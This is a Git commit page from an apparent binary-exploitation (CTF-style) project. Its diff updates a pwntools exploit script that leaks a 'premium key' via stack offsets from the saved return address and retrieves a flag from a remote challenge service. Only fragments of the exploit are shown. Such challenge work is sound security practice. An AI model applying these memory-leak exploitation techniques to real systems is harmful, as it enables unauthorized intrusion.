cato447/BinexProject
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Random code addresses (#5)

Browse Source 
* Enable random addresses for generated code

* Enable custom stack in sandbox

* Triggering CI?

* Update exploit to work in release mode.
This commit is contained in:
Maier Johannes
2024-01-25 01:24:31 +01:00
committed by GitHub
parent b3e3b7b049
commit 01934af8be
2 changed files with 28 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
exploit/exploit.py
View File

@@ -126,9 +126,9 @@ def exec_program(p: pwnlib.tubes.remote.remote, program: bytes) -> int:
def extract_premium_key(is_debug: bool = False, port: int = PORT):
if is_debug:
offset_saved_rip_to_activation_key = 0x396d # debug mode
offset_saved_rip_to_activation_key = 0x38bc # debug mode
else:
offset_saved_rip_to_activation_key = 0x2832 # release mode
offset_saved_rip_to_activation_key = 0x37a6 # release mode
premium_key = b""
@@ -216,8 +216,9 @@ def get_flag(p: pwnlib.tubes.remote.remote, is_debug: bool = False):
if __name__ == "__main__":
context.log_level = 'warn'
debug = False
premium_key = extract_premium_key(is_debug=True)
premium_key = extract_premium_key(is_debug=debug)
p = connect(premium_key, True)
print(get_flag(p, is_debug=True))
print(get_flag(p, is_debug=debug))